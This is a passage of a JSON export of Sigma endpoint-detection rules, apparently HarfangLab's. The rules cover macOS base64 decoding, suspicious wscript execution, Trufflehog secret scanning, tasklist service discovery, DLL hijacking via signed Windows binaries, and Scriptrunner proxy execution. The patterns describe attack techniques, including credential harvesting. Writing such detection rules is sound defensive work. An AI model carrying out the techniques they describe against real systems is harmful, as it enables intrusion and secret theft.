"rule_technique_tags": [
"attack.t1105",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bc01309-2aa0-419f-addd-eed4eb92903a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T16:09:45.126562Z",
"creation_date": "2026-03-23T11:45:34.616819Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616827Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md",
"https://attack.mitre.org/techniques/T1027/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1027_decoding_base64_macos.yml",
"content": "title: Base64 Data Decoded (macOS)\nid: 3bc01309-2aa0-419f-addd-eed4eb92903a\ndescription: |\n Detects the usage of the base64 utility to decode base64 encoded data.\n This technique can be used by an attacker to hide a malicious payload and evade security defenses.\n It is recommended to investigate the data that was decoded, how it was used, and the potentially malicious actions taken by the parent process.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md\n - https://attack.mitre.org/techniques/T1027/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/11/10\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027\n - attack.command_and_control\n - attack.t1132.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Obfuscation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/base64'\n CommandLine|contains:\n - ' -D'\n - ' --decode'\n # Filter-out missing parents\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_munki:\n GrandparentImage: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_homebrewshell:\n - ParentImage: '/opt/homebrew/Cellar/zsh/*/bin/zsh'\n - GrandparentImage: '/opt/homebrew/Cellar/ruby/*/bin/ruby'\n\n exclusion_cursor:\n ProcessAncestors|contains:\n - '|/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - '|/Applications/Cursor.app/Contents/Resources/app/resources/helpers/cursorsandbox'\n\n exclusion_claude:\n ProcessAncestors|contains:\n - '|/Users/*/.local/share/claude/versions/?.?.??'\n - '|/Users/*/Library/Application Support/Claude/claude-code/?.?.??/claude'\n\n exclusion_vscode:\n ProcessAncestors|contains: '|/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n\n exclusion_ruby:\n ProcessAncestors|contains: '|/Users/*/.rbenv/versions/*/bin/ruby'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bc01309-2aa0-419f-addd-eed4eb92903a",
"rule_name": "Base64 Data Decoded (macOS)",
"rule_description": "Detects the usage of the base64 utility to decode base64 encoded data.\nThis technique can be used by an attacker to hide a malicious payload and evade security defenses.\nIt is recommended to investigate the data that was decoded, how it was used, and the potentially malicious actions taken by the parent process.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2026-03-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bd1769f-b066-48af-bf7e-7abcc7770d0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623328Z",
"creation_date": "2026-03-23T11:45:34.623330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623334Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0xToxin/status/1569711852942249985",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_user_execution_of_wscript.yml",
"content": "title: Suspicious wscript.exe User Execution\nid: 3bd1769f-b066-48af-bf7e-7abcc7770d0c\ndescription: |\n Detects the suspicious user execution of Wscript, executing a script located outside the C drive.\n This can be indicative of a user execution of a malicious script located inside a user-mounted infected ISO file.\n It is recommended to investigate the content of the script executed and malicious actions taken by the wscript process to determine the legitimacy of this action.\nreferences:\n - https://twitter.com/0xToxin/status/1569711852942249985\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2022/09/28\nmodified: 2026/02/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wscript\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wscript.exe'\n - OriginalFileName: 'wscript.exe'\n\n selection_context:\n ParentImage|endswith: '\\explorer.exe'\n CommandLine|contains:\n - '.wsf'\n - '.vbs'\n - '.js'\n CurrentDirectory: '?:\\'\n\n selection_drive:\n CommandLine|contains: '\\wscript.exe ?:\\'\n\n filter_drive:\n CommandLine|contains: '\\wscript.exe C:\\'\n\n exclusion_user:\n ProcessCommandLine|contains: ' ?:\\Users\\\\*\\AppData\\Roaming\\'\n\n exclusion_litetouch:\n ProcessCommandLine: '?:\\windows\\system32\\wscript.exe ?:\\MININT\\Scripts\\LiteTouch.wsf'\n\n exclusion_copilote:\n ProcessCommandLine|contains:\n - '?:\\Windows\\System32\\WScript.exe ?:\\Copilote\\copilote_exe\\cop_*\\verifmaj.wsf'\n - '\\verifmaj.wsf //job:copilote'\n - '\\copilote_exe\\cop_exe\\verifmaj.wsf //job:'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bd1769f-b066-48af-bf7e-7abcc7770d0c",
"rule_name": "Suspicious wscript.exe User Execution",
"rule_description": "Detects the suspicious user execution of Wscript, executing a script located outside the C drive.\nThis can be indicative of a user execution of a malicious script located inside a user-mounted infected ISO file.\nIt is recommended to investigate the content of the script executed and malicious actions taken by the wscript process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-09-28",
"rule_modified_date": "2026-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bdb8ee4-7315-4cab-8678-275764e2199a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072071Z",
"creation_date": "2026-03-23T11:45:34.072073Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072077Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/trufflesecurity/trufflehog",
"https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm",
"https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1552_trufflehog_executed_windows.yml",
"content": "title: Trufflehog Executed (Windows)\nid: 3bdb8ee4-7315-4cab-8678-275764e2199a\ndescription: |\n Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\n This tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\n The Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\n It is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\nreferences:\n - https://github.com/trufflesecurity/trufflehog\n - https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm\n - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2025/11/26\nmodified: 2025/11/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.credential_access\n - attack.t1552\n - attack.collection\n - attack.t1213\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Trufflehog\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\trufflehog.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bdb8ee4-7315-4cab-8678-275764e2199a",
"rule_name": "Trufflehog Executed (Windows)",
"rule_description": "Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\nThis tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\nThe Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\nIt is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-11-26",
"rule_modified_date": "2025-11-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1213",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083543Z",
"creation_date": "2026-03-23T11:45:34.083545Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083550Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/"
],
"name": "t1007_tasklist_svc.yml",
"content": "title: System Service Discovered via tasklist.exe\nid: 3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef\ndescription: |\n Detects the execution of tasklist.exe to enumerate system services.\n Adversaries can use this command during discovery phase to enumerate running system services.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/12/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\tasklist.exe'\n - OriginalFileName: 'tasklist.exe'\n\n selection_commandline:\n CommandLine|contains:\n - ' -svc'\n - '/svc' # works with not space between command and argument\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_commandline:\n CommandLine: 'tasklist /svc /fi imagename eq IpDesktopSoftphone.exe * /fi USERNAME eq *'\n\n exclusion_alcatel:\n ParentImage|endswith: '\\cmd.exe'\n ParentCommandLine|contains|all:\n - 'tasklist /svc /fi '\n - ' \"imagename eq '\n GrandparentImage|endswith: '\\cmd.exe'\n GrandparentCommandLine|contains|all:\n - 'Alcatel-Lucent Enterprise'\n - 'IP Desktop Softphone'\n\n exclusion_alcatel_phone:\n # tasklist /svc /fi \"imagename eq MyNOEPhoneIPDesktop.exe\" /fi \"status eq Unknown\"\n # tasklist /svc /fi \"imagename eq WerFault.exe\" /fi \"windowtitle eq IP Desktop Softphone*\"\n CommandLine|contains:\n - 'imagename eq MyNOEPhoneIPDesktop.exe'\n - 'windowtitle eq IP Desktop Softphone'\n - 'imagename eq IpDesktopSoftphone.exe'\n\n exclusion_gathernetworkinfo:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c tasklist /svc > processes.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_veritas:\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c tasklist /svc > ..\\Temp\\\\????????-????-????-????-????????????-output.txt'\n GrandparentCommandLine: '?:\\Program Files\\Veritas\\NetBackup\\bin\\nbdisco.exe'\n\n # https://www.horoquartz.fr/etemptation/\n exclusion_etemptation:\n - CommandLine: 'tasklist /svc /nh /fo CSV /fi SERVICES eq hrmsrvnt etptaprd'\n - Ancestors|endswith: '\\Horoquartz\\Etemptation\\perl\\bin\\perl.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_manageengine:\n ParentImage|endswith: '\\bin\\java.exe'\n CommandLine: 'tasklist /svc /fi SERVICES eq uems_service'\n\n exclusion_system5:\n GrandparentImage|endswith: '\\perl.exe'\n CurrentDirectory: '?:\\Program Files\\Carestream\\System5\\syscheck\\'\n\n exclusion_cygwin:\n Ancestors|contains:\n - '?:\\WINAPP32\\CYGWIN\\bin\\cygrunsrv.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\WINAPP64\\Perl64\\bin\\perl.exe|?:\\WINAPP64\\Perl64\\bin\\perl.exe|?:\\WINAPP64\\Perl64\\bin\\perl.exe|?:\\WINAPP32\\Cygwin\\bin\\bash.exe|?:\\WINAPP32\\Cygwin\\bin\\bash.exe'\n\n exclusion_guardian_browser:\n ParentImage: '?:\\User\\\\*\\AppData\\Local\\Programs\\guardian-browser\\Guardian Browser.exe'\n CommandLine: 'tasklist.exe /svc /fo csv'\n\n exclusion_servicenow1:\n ParentImage|contains: 'ServiceNow'\n Ancestors|endswith: '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n exclusion_servicenow2:\n GrandparentCommandLine: 'cmd /c chcp 65001 & tasklist /svc * > \\\\\\\\127.0.0.1\\c$\\temp\\\\*\\psscript_output_*.txt 2>&1'\n Ancestors|endswith: '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_nessus:\n GrandparentCommandLine|startswith: '?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\System32\\tasklist.exe /FO csv /svc > ?:\\Windows\\TEMP\\nessus_task_list'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef",
"rule_name": "System Service Discovered via tasklist.exe",
"rule_description": "Detects the execution of tasklist.exe to enumerate system services.\nAdversaries can use this command during discovery phase to enumerate running system services.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c24db86-ccf8-47c4-8cd0-8fc0a0e0b4f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600046Z",
"creation_date": "2026-03-23T11:45:34.600050Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmnotificationbroker.yml",
"content": "title: DLL Hijacking via dmnotificationbroker.exe\nid: 3c24db86-ccf8-47c4-8cd0-8fc0a0e0b4f2\ndescription: |\n Detects potential Windows DLL Hijacking via dmnotificationbroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmnotificationbroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\dui70.dll'\n - '\\windows.ui.immersive.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c24db86-ccf8-47c4-8cd0-8fc0a0e0b4f2",
"rule_name": "DLL Hijacking via dmnotificationbroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmnotificationbroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c4e7150-691f-44ce-b899-5ce197963e39",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081678Z",
"creation_date": "2026-03-23T11:45:34.081680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081685Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_whoami.yml",
"content": "title: DLL Hijacking via whoami.exe\nid: 3c4e7150-691f-44ce-b899-5ce197963e39\ndescription: |\n Detects potential Windows DLL Hijacking via whoami.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'whoami.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\netutils.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c4e7150-691f-44ce-b899-5ce197963e39",
"rule_name": "DLL Hijacking via whoami.exe",
"rule_description": "Detects potential Windows DLL Hijacking via whoami.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c604ffa-3752-4605-b05e-b1f5945d7fc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080350Z",
"creation_date": "2026-03-23T11:45:34.080352Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080356Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/",
"https://attack.mitre.org/techniques/T1202/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1202_indirect_command_execution_scriptrunner.yml",
"content": "title: Indirect Command Executed via Scriptrunner.exe\nid: 3c604ffa-3752-4605-b05e-b1f5945d7fc5\ndescription: |\n Detects the execution of the legitimate Scriptrunner.exe Windows binary, used to provide an interface between the Command Prompt and Windows Explorer.\n Attackers may abuse it to bypass security restrictions by using Scriptrunner to proxy the execution of other binaries.\n It is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/\n - https://attack.mitre.org/techniques/T1202/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/02\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Scriptrunner\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\Scriptrunner.exe'\n - OriginalFileName: 'Scriptrunner.exe'\n\n selection_args:\n CommandLine|contains: 'appvscript '\n\n exclusion_kopia:\n CommandLine: 'ScriptRunner.exe -appvscript KopiaUI-Setup-*.exe /S /allusers /disableAutoUpdates -appvscriptrunnerparameters -wait -timeout=300'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c604ffa-3752-4605-b05e-b1f5945d7fc5",
"rule_name": "Indirect Command Executed via Scriptrunner.exe",
"rule_description": "Detects the execution of the legitimate Scriptrunner.exe Windows binary, used to provide an interface between the Command Prompt and Windows Explorer.\nAttackers may abuse it to bypass security restrictions by using Scriptrunner to proxy the execution of other binaries.\nIt is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
